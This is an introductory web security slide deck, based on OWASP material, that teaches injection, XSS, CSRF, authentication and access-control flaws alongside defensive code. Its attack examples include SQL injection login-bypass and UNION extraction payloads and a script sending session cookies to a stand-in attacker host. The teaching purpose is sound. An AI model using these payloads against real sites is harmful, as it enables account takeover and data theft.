Web Application Security
in a nutshell
An ultra-compact intro (or refresher) to Web Application Security
Created by Björn Kimminich / @bkimminich
Famous last words...
“Nobody would bother to hack us.”
“Our Firewall, IDS and IPS will keep us safe.”
“We will add security to the system later.”
“What's the worst that could actually happen?”
Injection means...
...tricking an application into including unintended commands in the data sent to an interpreter.
Interpreter means...
...a program that takes a String and interprets it as a command.
Interpreters are used for...
- SQL
- HQL
- OS Shell
- LDAP
- XPath
- ...
Bypassing Authentication
with SQL Injection
String query = "SELECT id FROM users " +
"WHERE name = '" + req.getParameter("username") + "' " + // raw request parameter concatenated into the SQL text
"AND password = '" + req.getParameter("password") + "'";
The intended use case results in a query like this:
SELECT id FROM users WHERE name = 'bjoern' AND password = 'secret'
Attack Examples
on authentication queries
Disabling password check for a known username:
SELECT id FROM users WHERE name = 'bjoern'--' AND password = '?'
Logging in without even knowing a username:
SELECT id FROM users WHERE name = '' or 1=1--' AND password = '?'
Spying out Data
with SQL Injection
String query =
"SELECT id,author,title,price FROM books " +
"WHERE title LIKE '%" + req.getParameter("query") + "%'";
The intended use case results in a query like this:
SELECT id,author,title,price FROM books WHERE title LIKE '%tangled web%'
Attack Examples
on data retrieval queries
Probing for right number of result set columns:
SELECT [...] WHERE title LIKE '%' UNION SELECT null FROM users--%'
SELECT [...] WHERE title LIKE '%' UNION SELECT null,null FROM users--%'
SELECT [...] WHERE title LIKE '%' UNION SELECT null,null,null FROM users--%'
Using known column names to extract data:
SELECT [...] WHERE title LIKE '%' UNION SELECT name,password,email FROM users--%'
Preventing Injection
- Avoid Interpreters
- Bind Variables
- Prepared Statements
- Least Privileges for app DB user
- White List Input Validation
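Added example (Python with the built-in sqlite3 module rather than the deck's Java; not code from the original slides): the login query built by string concatenation beside its bind-variable version, run against a constructed in-memory users table, plus an allow-list check for the username. All function names are hypothetical.

```python
import re
import sqlite3

# Constructed stand-in for the deck's users table (one row: bjoern / secret).
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, name TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES (1, 'bjoern', 'secret')")
    return db

def login_concatenated(db, username, password):
    # Mirrors the deck's Java snippet: the parameters become part of the SQL text,
    # so a quote or a '--' comment in the input changes what the interpreter runs.
    query = ("SELECT id FROM users WHERE name = '" + username + "' "
             "AND password = '" + password + "'")
    return db.execute(query).fetchone()

def login_bound(db, username, password):
    # Bind variables / prepared statement: the SQL text is fixed at development time,
    # the values are handed to the driver separately and are never parsed as SQL.
    query = "SELECT id FROM users WHERE name = ? AND password = ?"
    return db.execute(query, (username, password)).fetchone()

# Allow-list input validation as a second layer: only characters a username may contain.
USERNAME_PATTERN = re.compile(r"^[A-Za-z0-9_.-]{1,32}$")

def is_valid_username(username):
    return bool(USERNAME_PATTERN.match(username))
```

With the concatenated query the deck's inputs `bjoern'--` and `' or 1=1--` both return the id of the first user; the bound query returns a row only for the real credentials.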
Cross Site Scripting (XSS)
Malicious Code is sent...
...to an innocent user's browser through
- a form field or URL (Reflected XSS)
- a previously stored DB record (Persistent XSS)
- a DOM element of a rich JS client (Local XSS)
Possible Damage from XSS
- stolen user session
- stolen sensitive data
- rewriting web page
- redirecting to malicious site
XSS Vulnerability Example
http://bookwo.rm/titles/search?keywords=raspberry%20pi
The intended use case is to display the keywords above the results:
<%
String keywords = request.getParameter("keywords");
List<Book> results = titleSearchService.findByKeywords(keywords.split(" "));
%>
There are <%=results.size()%> results for your search by <em><%=keywords%></em>
<table>
<% for (Book book : results) { %>
<%-- render result as table rows --%>
<% } %>
</table>
XSS Attack Examples
Probing for XSS Vulnerability
<script>alert(1)</script>
Stealing User Session
<script>
new Image().src="http://my.evil-si.te/hijack.php?c="+encodeURI(document.cookie);
</script>
Site Defacement
<script>document.body.background="http://my.evil-si.te/image.jpg";</script>
Preventing XSS
- Do not unnecessarily include user supplied input into output
- Output encode all user supplied input
- Sanitize HTML where user supplied HTML is unavoidable
- White List Input Validation
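Added example (Python, not code from the original slides): the deck's search-result line rendered once with the raw keywords parameter and once output-encoded for the HTML body context, plus an allow-list check on the keywords. The function names and the keyword character set are assumptions.

```python
import html
import re

# Allow-list for search keywords (assumed policy): letters, digits, space and a little punctuation.
KEYWORD_PATTERN = re.compile(r"^[A-Za-z0-9 .,'-]{1,100}$")

def validate_keywords(keywords):
    """Allow-list input validation: reject anything outside the expected character set."""
    return bool(KEYWORD_PATTERN.match(keywords))

def render_unsafe(keywords, result_count):
    # Mirrors the deck's JSP: the request parameter is echoed verbatim into the page,
    # so markup in the parameter is handed to the browser as markup.
    return ("There are %d results for your search by <em>%s</em>"
            % (result_count, keywords))

def render_safe(keywords, result_count):
    # Output encoding for the HTML body context; quote=True also escapes quotes so the
    # same helper is safe inside quoted attribute values.
    return ("There are %d results for your search by <em>%s</em>"
            % (result_count, html.escape(keywords, quote=True)))
```

The encoded output shows the probe string as text; the browser never sees a script element.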
Cross Site Request Forgery (CSRF)
A Victim's Browser...
...is tricked into issuing a command to a vulnerable webapp. This is caused by browsers automatically including user authentication data with each request.
- Session Cookie
- Basic Authentication
- Authorization HTTP Header
- ...
Preventing CSRF
- Add a secret token to all sensitive requests
- This token must not be automatically submitted
- Require secondary authentication for sensitive functions
- Beware exposing the token in a Referer HTTP header
Make sure your application has no XSS holes that could be exploited to attack others!
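Added example (Python, not code from the original slides): a per-session secret token that is embedded in the form and checked on the server, so a request that carries only the automatically sent session cookie is rejected. The session store, cookie name and the /transfer endpoint are constructed for the example.

```python
import hmac
import secrets

# Constructed in-memory session store: session id -> {"user": ..., "csrf_token": ...}
SESSIONS = {}

def start_session(user):
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user": user, "csrf_token": secrets.token_urlsafe(32)}
    return sid

def render_transfer_form(sid):
    # The token travels in the page body; unlike the cookie, the browser will not
    # attach it to a request that another site triggers.
    token = SESSIONS[sid]["csrf_token"]
    return ('<form method="post" action="/transfer">'
            '<input type="hidden" name="csrf_token" value="%s">' % token +
            '<input name="amount"><input type="submit"></form>')

def handle_transfer(cookies, form):
    """Return an HTTP status: 401 without session, 403 without a valid token, 200 otherwise."""
    session = SESSIONS.get(cookies.get("JSESSIONID"))
    if session is None:
        return 401
    submitted = form.get("csrf_token", "")
    # Constant-time comparison; encode to bytes so non-ASCII input cannot raise.
    if not hmac.compare_digest(submitted.encode(), session["csrf_token"].encode()):
        return 403
    return 200
```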
Typical Authentication Flaws
- Allowing weak passwords
- Storing SSL certificate insecurely
- Credentials passed via insecure http connection
- Exposing session IDs in URLs, over unencrypted connections, in logs, ...
Side Channel Attack Vectors
- Change Password
- “Remember me”
- Forgot Password
- Secret Questions
Classical Broken Authentication...
...due to starting login process on unencrypted page
http://sick-cure-ba.nk/login.do
POST /login.do HTTP/1.1
Host: sick-cure-ba.nk
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
username=bjoern&password=secret
Weak hashes put passwords at risk...
...as do unsalted strong hash algorithms
id | username   | password
1  | admin      | d033e22ae348aeb5660fc2140aec35850c4da997
2  | bjoern     | 2bb80d537b1da3e38bd30361aa855686bde0eacd7162fef6a25fe97bf527a25b
3  | localhorst | 0f59bd4122f0c02002ec578e4eec306ed48ff2ad0105a307a6dc98c0e9a54fe464e5f807236edce12134067a0b6690891e82490b2b9fa7b4171db43ee8cb4006
Cracking unsalted hashes with a Rainbow Table attack is fast, even though the last two of them might seem sufficiently secure given their 256- and 512-bit length.
You can even crack password hashes online, e.g. at CrackStation or via a tweet to @PlzCrack.
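Added example (Python, not code from the original slides): why the table above is weak and what salting changes. The unsalted SHA-256 of a password is identical for every user who picks it, whereas a random per-user salt with PBKDF2 yields a different value on every call and still verifies. The iteration count and the storage format are assumptions.

```python
import hashlib
import hmac
import os

ITERATIONS = 600_000  # PBKDF2-HMAC-SHA256 work factor (assumed value; tune for your hardware)

def unsalted_sha256(password):
    # What the deck's table holds for bjoern: same password -> same hash for everyone,
    # so one precomputed table breaks all users at once.
    return hashlib.sha256(password.encode()).hexdigest()

def hash_password(password, salt=None):
    """Return 'iterations$salt_hex$hash_hex' using a random 16-byte salt."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return "%d$%s$%s" % (ITERATIONS, salt.hex(), digest.hex())

def verify_password(password, stored):
    # Recompute with the stored salt and iteration count; compare in constant time.
    iterations, salt_hex, hash_hex = stored.split("$")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest.hex(), hash_hex)
```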
Securing Authentication
- Centralize and standardize authentication
- Protect credentials with SSL/TLS
- Use strong authentication mechanisms (with multiple factors)
- Do not store or log unencrypted credentials
Common Authorization Mistakes
- Hiding object references instead of restricting access
- Displaying only authorized links and menu choices
- Trusting client-side access control mechanisms
- Lack of server-side verification of user privileges
Request Tampering for Privilege Escalation...
...and finding all kinds of Access Control Issues
http://logistics-worldwi.de/showShipment?id=40643108
http://my-universi.ty/api/students/6503/exams/view
http://document-warehou.se/landingpage?content=index.html
Securing Access Control
- Never rely on “Security by obscurity”
- Replace direct object references with temporary mappings
- Restrict data and functionality access to authorized users
- Enforce user or role based permissions
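Added example (Python, not code from the original slides): the deck's showShipment?id=40643108 pattern replaced by per-session temporary handles, with the ownership check still enforced on the server when a handle is resolved. The shipment data, session ids and function names are constructed for the example.

```python
import secrets

# Constructed data: shipment id -> owning customer (stands in for the logistics DB).
SHIPMENTS = {40643108: "acme", 40643109: "globex"}

# Per-session map of opaque temporary handles -> real ids; discarded with the session.
SESSION_REFS = {}

def list_shipments(session_id, user):
    """Return opaque handles for the user's own shipments; real ids never leave the server."""
    refs = SESSION_REFS.setdefault(session_id, {})
    handles = []
    for real_id, owner in SHIPMENTS.items():
        if owner == user:
            handle = secrets.token_urlsafe(8)
            refs[handle] = real_id
            handles.append(handle)
    return handles

def show_shipment(session_id, user, handle):
    """Resolve the handle within this session only, then re-check ownership server-side."""
    real_id = SESSION_REFS.get(session_id, {}).get(handle)
    if real_id is None:
        return None  # unknown or foreign handle: reveals nothing about existence
    if SHIPMENTS[real_id] != user:
        return None  # defence in depth: permission is verified even for a mapped handle
    return real_id
```

A guessed numeric id or a handle copied from another session resolves to nothing, which is the server-side verification the "Common Authorization Mistakes" slide asks for.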
Possible Environmental Vulnerabilities
- Software Libraries
- Application Server
- Web Server
- Operating System
- ...
Known Vulnerability Examples
Component | Vulnerability | Affected
OpenSSL | Obtain sensitive information from process memory via crafted packets that trigger a buffer over-read (Heartbleed) | 1.0.1 - 1.0.1f, 1.0.2-beta, 1.0.2-beta1
Unix Bash | Execution of arbitrary commands on vulnerable Bash, potentially compromising the entire system (Shellshock) | CGI, OpenSSH, DHCP, QMail, ...
Struts | Remote manipulation of the ClassLoader via the class parameter, which is passed to the getClass() method | before 2.3.16.1
Struts | Wildcard cookiesName does not properly restrict access to the getClass() method, which allows ClassLoader manipulation | before 2.3.16.2
Protection from Environmental Vulnerabilities
- Monitor security of used components
- Keep up with patches for used components
- Remove unnecessary stuff on all levels
- Restrict use of unapproved components
Java and .NET project dependencies can be monitored with OWASP Dependency Check, which relies on the NIST National Vulnerability Database. For JavaScript and Node.js modules there is Retire.js, which is updated manually via its GitHub project. Both tools integrate well with typical software build processes.
Credits
Presentation created with reveal.js
The HTML Presentation Framework
Based on free material provided by OWASP
The Open Web Application Security Project
Background image based on Digital Shodan by sephiroth-kmfdm
THE END
by Björn Kimminich / kimminich.de
These slides are publicly available on GitHub and Slideshare.